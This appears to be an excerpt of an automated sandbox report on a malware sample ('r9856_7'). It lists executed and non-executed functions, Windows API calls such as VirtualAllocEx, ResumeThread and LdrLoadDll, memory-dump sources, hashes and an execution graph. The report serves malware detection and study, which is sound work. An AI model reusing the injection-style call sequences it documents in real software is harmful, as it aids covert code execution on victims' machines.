                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072DA4F6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 3ec5d5635f14ba709df3ca81781287fbc156af81d6096b7e42bce8ad70a8a94c
                                                                • Instruction ID: be1460a2782a20f1e74e80c1c7e619bdce2ab4e6501964f97e3379d57168ff2b
                                                                • Opcode Fuzzy Hash: 3ec5d5635f14ba709df3ca81781287fbc156af81d6096b7e42bce8ad70a8a94c
                                                                • Instruction Fuzzy Hash: F6115672D003498FDB20DFAAC845BEEBFF5AF48310F24881AE569A7250C7359945CFA0
                                                                Function 072DA488 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072DA4F6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 27cb0226a449ee0e5d1598d1ec569885ef96cba5f742e89649c78aedd05e4e1f
                                                                • Instruction ID: d277af46f757e267978638bf60e3d0ce76b04113a1d66bf8f75b33f62ae6e5bf
                                                                • Opcode Fuzzy Hash: 27cb0226a449ee0e5d1598d1ec569885ef96cba5f742e89649c78aedd05e4e1f
                                                                • Instruction Fuzzy Hash: 9C112675C003499FDB20DFAAC845BDEBBF5EB48320F148419E565A7250CB759940CFA4
                                                                Function 072DA2F8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 0a46a02a5de843a824edabe643184e1cdb0caeb4a9fb0162e144ede30ed3f585
                                                                • Instruction ID: bda7e72b0cd27374917f05bd49c55985b4f898d601a4fd23834bd867a0d2a547
                                                                • Opcode Fuzzy Hash: 0a46a02a5de843a824edabe643184e1cdb0caeb4a9fb0162e144ede30ed3f585
                                                                • Instruction Fuzzy Hash: C01158B1D003498FDB20DFAAC845BEEFBF5EB48320F248419D559A7640CB796945CFA4
                                                                Function 072DA300 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 2f15ee37dc1fdf97fa58f6c655927b1f9b09698fc188f12271a92e4ebd326cbc
                                                                • Instruction ID: ad621d8893c34fab3a97b602f05f8785c9d1cf0a0b89b511543df1b02315f908
                                                                • Opcode Fuzzy Hash: 2f15ee37dc1fdf97fa58f6c655927b1f9b09698fc188f12271a92e4ebd326cbc
                                                                • Instruction Fuzzy Hash: A6113AB1D003498FDB20DFAAC445B9EFBF5EB48324F148419D559A7240CB796945CF94
                                                                Function 072DB2F4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 072DD945
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: MessagePost
                                                                • String ID:
                                                                • API String ID: 410705778-0
                                                                • Opcode ID: 0fe9da2b44694f66574d0e2ca6383bad7d1976740a067573fe393f1aea285506
                                                                • Instruction ID: 319b6a3be4b5f4e0a64ad4fd927396a318b7cbf93729b2431cd8b5a86180d22c
                                                                • Opcode Fuzzy Hash: 0fe9da2b44694f66574d0e2ca6383bad7d1976740a067573fe393f1aea285506
                                                                • Instruction Fuzzy Hash: FB1106B59107499FDB10DF9AC885BDEBBF8FB48324F10841AE558A7200C375A944CFA5
                                                                Function 02E7AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02E7AFFE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1385451724.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 47f95923ffb6cee5e3d3d545302b78d6e3c09cde88582ffbe0bce77a0d15132d
                                                                • Instruction ID: 32f05c59b76648f3bb4b95b70ebcc6ebebe6fd000fdce30eead3b9b33465df3d
                                                                • Opcode Fuzzy Hash: 47f95923ffb6cee5e3d3d545302b78d6e3c09cde88582ffbe0bce77a0d15132d
                                                                • Instruction Fuzzy Hash: 371102B6C002498FCB20CF9AC444B9EFBF4AB48318F10842AD529A7210D375A545CFA1
                                                                Function 0162D4C4 Relevance: .1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1382210062.000000000162D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0162D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_162d000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0198fb16096cd7bbdb4f87c16a978b186a1319abaf58cd4520fa5b47c4f6a564
                                                                • Instruction ID: aa96974b52b9c5983d87b4a2231c51905f9ff880d6b14235e32b510df5bc8dfb
                                                                • Opcode Fuzzy Hash: 0198fb16096cd7bbdb4f87c16a978b186a1319abaf58cd4520fa5b47c4f6a564
                                                                • Instruction Fuzzy Hash: B0210371504640DFDB15DF54DDC0B26BF65FB88328F20C569E8091B356C376D456CEA2
                                                                Function 0162D3D8 Relevance: .1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1382210062.000000000162D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0162D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_162d000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: acbb272b28fe828df25adce437e337f8025b679f3dfdee4d2338831c20b55899
                                                                • Instruction ID: 8a1b048915422ef483bd9a9d9ec52c518660b7aab89086f153a504787c6be71f
                                                                • Opcode Fuzzy Hash: acbb272b28fe828df25adce437e337f8025b679f3dfdee4d2338831c20b55899
                                                                • Instruction Fuzzy Hash: 74213371604600DFDB05DF44DDC0B5ABB65FB88324F20C169E80A0F346C336E446CEA2
                                                                Function 02DED01C Relevance: .1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1383703737.0000000002DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DED000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2ded000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 51beb6c32b6f08d97f3533d3ee14bc8e2a3c10b233f001b1f63f6c6ebaaf80b7
                                                                • Instruction ID: 25381e013581259ac837edec6df52ec2f5002006d0e8bdaa8584debc7ab8c047
                                                                • Opcode Fuzzy Hash: 51beb6c32b6f08d97f3533d3ee14bc8e2a3c10b233f001b1f63f6c6ebaaf80b7
                                                                • Instruction Fuzzy Hash: 5421D075604200DFDF14EF14D984B16BB6AEB84314F38C569E84A4B386CB36D847CA62
                                                                Function 02DED1D4 Relevance: .1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1383703737.0000000002DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DED000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2ded000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9212997deb0b9309b079cdb8cb5f9eb20f8a60071df6afaa24fdba60b414f145
                                                                • Instruction ID: 3a14171d659d1148e182e2a1e7b851285d68ab532d1d1fe8cc762cf1bf760571
                                                                • Opcode Fuzzy Hash: 9212997deb0b9309b079cdb8cb5f9eb20f8a60071df6afaa24fdba60b414f145
                                                                • Instruction Fuzzy Hash: 3A21F575A04200EFDF15EF10D9C0B15BB6AFB84314F20C56DD84A4B396CB36D846CA61
                                                                Function 02DED005 Relevance: .1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1383703737.0000000002DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DED000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2ded000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ef22dbde8d61c24a1e1e58e98e43e706b929b22739e1800aacb5c2e99397049e
                                                                • Instruction ID: 43d809128c1906e760672797a176e174562862711f7541619f277f45f17a3078
                                                                • Opcode Fuzzy Hash: ef22dbde8d61c24a1e1e58e98e43e706b929b22739e1800aacb5c2e99397049e
                                                                • Instruction Fuzzy Hash: 142184755093C08FCB16DF24D594715BF72EB46214F28C5EAD8498F6A7C33A980BCB62
                                                                Function 0162D4BF Relevance: .1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1382210062.000000000162D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0162D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_162d000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                • Instruction ID: d19a1792e52c819aac3c06d32220a1f42544d296f952bd252610b2bf0ff18bdc
                                                                • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                • Instruction Fuzzy Hash: 4311DF76504280CFCB06CF54D9C0B16BF72FB84324F24C6A9D8490B256C336D456CFA2
                                                                Function 0162D3D3 Relevance: .1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1382210062.000000000162D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0162D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_162d000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                • Instruction ID: 827198c9deef6f07dfbb9f19cb9cf23441ba9261af5088bf4308d8291fbd05de
                                                                • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                • Instruction Fuzzy Hash: 8C11CAB6504680DFDB06CF44D9C0B56BF62FB84324F24C2A9D8090A256C33AE45ACFA2
                                                                Function 02DED1CF Relevance: .1, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1383703737.0000000002DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DED000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2ded000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                • Instruction ID: add4006d3dcb42d161a10baada69c95702185774871abf4513198818a3588020
                                                                • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                • Instruction Fuzzy Hash: 80118B79504280DFCB15DF14D6C4B15BBA2FB84324F24C6ADD84A4B796C33AD84ACB61

                                                                Non-executed Functions

                                                                Function 072D7788 Relevance: .3, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 430b5415edfaf048e5b8bf6123f9e769b8ad8df1120b7c47d35bef594c8b7ddb
                                                                • Instruction ID: a7c9ed519bec9e5f01f8ddb6a80de265101f372922c104b7ee326f37235ac5b5
                                                                • Opcode Fuzzy Hash: 430b5415edfaf048e5b8bf6123f9e769b8ad8df1120b7c47d35bef594c8b7ddb
                                                                • Instruction Fuzzy Hash: 23E1D7B4E102198FDB14DFA9C580AAEBBF6FF89304F248169D854AB355D734AD41CFA0
                                                                Function 072D96A0 Relevance: .3, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f04849b4209a451cd2cfd759f39b4dafb06ebab84ab960c81e88e14a58a14668
                                                                • Instruction ID: 68aea644b1ea4ff4345bea9d6cadfe12c3c6542c8fe7da0edbe1555dad486223
                                                                • Opcode Fuzzy Hash: f04849b4209a451cd2cfd759f39b4dafb06ebab84ab960c81e88e14a58a14668
                                                                • Instruction Fuzzy Hash: FCE1F9B4E102198FDB14CF99C580AAEBBF6FF89304F248169E454AB355D735AD81CFA0
                                                                Function 072D9268 Relevance: .3, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 97715f7cab740ad842a7b919641d9fdf16c926729ac14a8e0f9e9decbd921b54
                                                                • Instruction ID: 3e0cccb796b59d5803cf0a806d4bb59c2dc970048d691842c87be24a373319d5
                                                                • Opcode Fuzzy Hash: 97715f7cab740ad842a7b919641d9fdf16c926729ac14a8e0f9e9decbd921b54
                                                                • Instruction Fuzzy Hash: B9E1EAB4E102198FDB14CFA9C580AAEBBF6FF89304F248169E454A7355D735AD81CFA0
                                                                Function 072D7BC0 Relevance: .3, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: df9b3032c68b7415631f0711795db557e346bd58a49198fb8553d8bd457eda8e
                                                                • Instruction ID: 63b1b6f7be05070f0d35f99b87fb151fa8260e168343d24186c1ae87c6a981ea
                                                                • Opcode Fuzzy Hash: df9b3032c68b7415631f0711795db557e346bd58a49198fb8553d8bd457eda8e
                                                                • Instruction Fuzzy Hash: 6AE1D6B4E102198FDB14CFA9C680AAEBBF6FF89314F248169D454AB355D734AD41CFA0
                                                                Function 072D9AD8 Relevance: .3, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2da441688d6c110319b1270c29c4f145c22099ade27d77be7fffdb203cc0470b
                                                                • Instruction ID: a011f5a0433b8dc5cc397fdcd87d5257cd332ce5c86afaf2774cf359620f030e
                                                                • Opcode Fuzzy Hash: 2da441688d6c110319b1270c29c4f145c22099ade27d77be7fffdb203cc0470b
                                                                • Instruction Fuzzy Hash: 8CE129B4E102598FDB14DFA9C580AAEBBF6FF89304F248169E444A7355D734AD81CFA0
                                                                Function 02E7D5BC Relevance: .3, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1385451724.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dc6c3e0180f90eb96060585eef7fc5e07038d188130ff9c304a9f429df6587d9
                                                                • Instruction ID: 763183a08ecf79e541227a787f1cfd60c7f85f92a7016d4562859981afe0ce0e
                                                                • Opcode Fuzzy Hash: dc6c3e0180f90eb96060585eef7fc5e07038d188130ff9c304a9f429df6587d9
                                                                • Instruction Fuzzy Hash: 25A1BE32E50209CFCF05DFB4C84499EB7B2FF85304B25856AE805AB665DB71E916CF90
                                                                Function 072D9257 Relevance: .1, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9630fea644f7fb66b7edb68bd9ee73422eeddcf43d8a2cebca566fdc043a3ebf
                                                                • Instruction ID: 22147c8872319de3c726111b0744460f39cdba2b878887e1234b05cc5c4627bb
                                                                • Opcode Fuzzy Hash: 9630fea644f7fb66b7edb68bd9ee73422eeddcf43d8a2cebca566fdc043a3ebf
                                                                • Instruction Fuzzy Hash: E05129B4E142198BDB14CFA9C9805AEFBF6FF89200F24816AD458AB355C734AD41CFA1
                                                                Function 072D7779 Relevance: .1, Instructions: 134COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 49a8b581bca56fe771ab8c4f363930db0f1c67c25290244f1ae6e9de91a1a9a4
                                                                • Instruction ID: 58731ec5b09abe78178c7053bbea20a63f378f555620ad2479865d7b8cce5c57
                                                                • Opcode Fuzzy Hash: 49a8b581bca56fe771ab8c4f363930db0f1c67c25290244f1ae6e9de91a1a9a4
                                                                • Instruction Fuzzy Hash: 395129B4E102198BDB14CFA9C9406AEFBF6FF89300F248169D858A7355D7359E41CFA1

                                                                Execution Graph

                                                                Execution Coverage:1.2%
                                                                Dynamic/Decrypted Code Coverage:4.6%
                                                                Signature Coverage:7.2%
                                                                Total number of Nodes:152
                                                                Total number of Limit Nodes:14
                                                                execution_graph 94651 42f443 94652 42f453 94651->94652 94653 42f459 94651->94653 94656 42e363 94653->94656 94655 42f47f 94659 42c4d3 94656->94659 94658 42e37e 94658->94655 94660 42c4ed 94659->94660 94661 42c4fe RtlAllocateHeap 94660->94661 94661->94658 94662 424903 94663 42491c 94662->94663 94672 4282b3 94663->94672 94665 424964 94677 42e283 94665->94677 94667 424939 94667->94665 94669 4249a7 94667->94669 94671 4249ac 94667->94671 94670 42e283 RtlFreeHeap 94669->94670 94670->94671 94673 428318 94672->94673 94674 42834f 94673->94674 94680 424603 94673->94680 94674->94667 94676 428331 94676->94667 94694 42c523 94677->94694 94679 424974 94681 424596 94680->94681 94682 4245a7 94681->94682 94683 4245bb 94681->94683 94689 4245cf 94681->94689 94684 42c1a3 NtClose 94682->94684 94690 42c1a3 94683->94690 94686 4245b0 94684->94686 94686->94676 94687 4245c4 94693 42e3a3 RtlAllocateHeap 94687->94693 94689->94676 94691 42c1c0 94690->94691 94692 42c1d1 NtClose 94691->94692 94692->94687 94693->94689 94695 42c540 94694->94695 94696 42c551 RtlFreeHeap 94695->94696 94696->94679 94741 42b773 94742 42b78d 94741->94742 94745 1122df0 LdrInitializeThunk 94742->94745 94743 42b7b5 94745->94743 94697 414343 94698 4282b3 2 API calls 94697->94698 94699 414363 94698->94699 94700 41af03 94701 41af47 94700->94701 94702 41af68 94701->94702 94703 42c1a3 NtClose 94701->94703 94703->94702 94704 41e0e3 94705 41e109 94704->94705 94711 41e209 94705->94711 94713 42f573 94705->94713 94707 41e1a1 94708 41e200 94707->94708 94707->94711 94724 42b7c3 94707->94724 94708->94711 94719 428543 94708->94719 94712 41e2bb 94714 42f4e3 94713->94714 94715 42f540 94714->94715 94716 42e363 RtlAllocateHeap 94714->94716 94715->94707 94717 42f51d 94716->94717 94718 42e283 RtlFreeHeap 94717->94718 94718->94715 94720 4285a8 94719->94720 94721 4285e3 94720->94721 94728 4187a3 94720->94728 94721->94712 94723 4285c5 94723->94712 94725 42b7e0 94724->94725 94735 1122c0a 94725->94735 94726 42b80c 94726->94708 94729 41876a 94728->94729 94732 42c573 94729->94732 94731 41878b 94731->94723 94733 42c590 94732->94733 94734 42c5a1 ExitProcess 94733->94734 94734->94731 94736 1122c11 94735->94736 94737 1122c1f LdrInitializeThunk 94735->94737 94736->94726 94737->94726 94746 413733 94749 42c433 94746->94749 94750 42c450 94749->94750 94753 1122c70 LdrInitializeThunk 94750->94753 94751 413755 94753->94751 94754 1122b60 LdrInitializeThunk 94755 413c93 94756 413cac 94755->94756 94761 4173f3 94756->94761 94758 413cca 94759 413d16 94758->94759 94760 413d03 PostThreadMessageW 94758->94760 94760->94759 94762 417417 94761->94762 94763 417453 LdrLoadDll 94762->94763 94764 41741e 94762->94764 94763->94764 94764->94758 94738 4189a8 94739 42c1a3 NtClose 94738->94739 94740 4189b2 94739->94740 94765 401cf9 94766 401d00 94765->94766 94769 42f913 94766->94769 94772 42de33 94769->94772 94773 42de59 94772->94773 94784 4075c3 94773->94784 94775 42de6f 94776 401d85 94775->94776 94787 41ad13 94775->94787 94778 42de8e 94779 42dea3 94778->94779 94781 42c573 ExitProcess 94778->94781 94798 427e53 94779->94798 94781->94779 94782 42debd 94783 42c573 ExitProcess 94782->94783 94783->94776 94802 4160c3 94784->94802 94786 4075d0 94786->94775 94788 41ad3f 94787->94788 94815 41ac03 94788->94815 94791 41ad6c 94794 42c1a3 NtClose 94791->94794 94796 41ad77 94791->94796 94792 41ada0 94792->94778 94793 41ad84 94793->94792 94795 42c1a3 NtClose 94793->94795 94794->94796 94797 41ad96 94795->94797 94796->94778 94797->94778 94799 427eb5 94798->94799 94801 427ec2 94799->94801 94826 418263 94799->94826 94801->94782 94803 4160dd 94802->94803 94805 4160f6 94803->94805 94806 42cc23 94803->94806 94805->94786 94807 42cc3d 94806->94807 94808 4282b3 2 API calls 94807->94808 94810 42cc63 94808->94810 94809 42cc6c 94809->94805 94810->94809 94811 42b7c3 LdrInitializeThunk 94810->94811 94812 42ccc9 94811->94812 94813 42e283 RtlFreeHeap 94812->94813 94814 42cce2 94813->94814 94814->94805 94816 41acf9 94815->94816 94817 41ac1d 94815->94817 94816->94791 94816->94793 94821 42b863 94817->94821 94820 42c1a3 NtClose 94820->94816 94822 42b87d 94821->94822 94825 11235c0 LdrInitializeThunk 94822->94825 94823 41aced 94823->94820 94825->94823 94827 41828d 94826->94827 94833 41878b 94827->94833 94834 413913 94827->94834 94829 4183b4 94830 42e283 RtlFreeHeap 94829->94830 94829->94833 94831 4183cc 94830->94831 94832 42c573 ExitProcess 94831->94832 94831->94833 94832->94833 94833->94801 94838 413933 94834->94838 94836 41399c 94836->94829 94837 413992 94837->94829 94838->94836 94839 41b023 NtClose RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 94838->94839 94839->94837

                                                                Executed Functions

                                                                Function 004173F3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 98 4173f3-41740f 99 417417-41741c 98->99 100 417412 call 42ef83 98->100 101 417422-417430 call 42f583 99->101 102 41741e-417421 99->102 100->99 105 417440-417451 call 42d903 101->105 106 417432-41743d call 42f823 101->106 111 417453-417467 LdrLoadDll 105->111 112 41746a-41746d 105->112 106->105 111->112
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417465
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_r9856_7.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: d20514dbed541711f06c5f50188ee8c907cd2a4cac65204c9f39392a3faeb9f2
                                                                • Instruction ID: cafd0f0782c66a26ed3eed41a317cb9385757514b29da0ef47942da2ec99165b
                                                                • Opcode Fuzzy Hash: d20514dbed541711f06c5f50188ee8c907cd2a4cac65204c9f39392a3faeb9f2
                                                                • Instruction Fuzzy Hash: DD015EB1E0020DBBDF10DAE1EC42FDEB7789B14308F4041AAE90897241F634EB588B95
                                                                Function 0042C1A3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 118 42c1a3-42c1df call 404993 call 42d413 NtClose
                                                                APIs
                                                                • NtClose.NTDLL(004245C4,?,96AB6DDB,?,?,004245C4,?), ref: 0042C1DA
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_r9856_7.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 9c513eafea19e212686e57a6e679e6276b6313a6f199c2cd6f68de667cf9f15e
                                                                • Instruction ID: 816ff1ec058514d28674ed5d053f4b8b5415fc4108edde945f024827e12296bb
                                                                • Opcode Fuzzy Hash: 9c513eafea19e212686e57a6e679e6276b6313a6f199c2cd6f68de667cf9f15e
                                                                • Instruction Fuzzy Hash: 20E04FB16042147BD620BA6AEC01F9BB75DDBC5714F01402AFA0CA7241C771B91186A4
                                                                Function 01122B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 132 1122b60-1122b6c LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 61836e97ad0cbf163ac07236349381f3a9a7d457a9d9acdf7c319f4a461f73a8
                                                                • Instruction ID: 505b9d8c3e52544a30161f268202c9d280ed9e0321c7438c4a947b5a3ed3b874
                                                                • Opcode Fuzzy Hash: 61836e97ad0cbf163ac07236349381f3a9a7d457a9d9acdf7c319f4a461f73a8
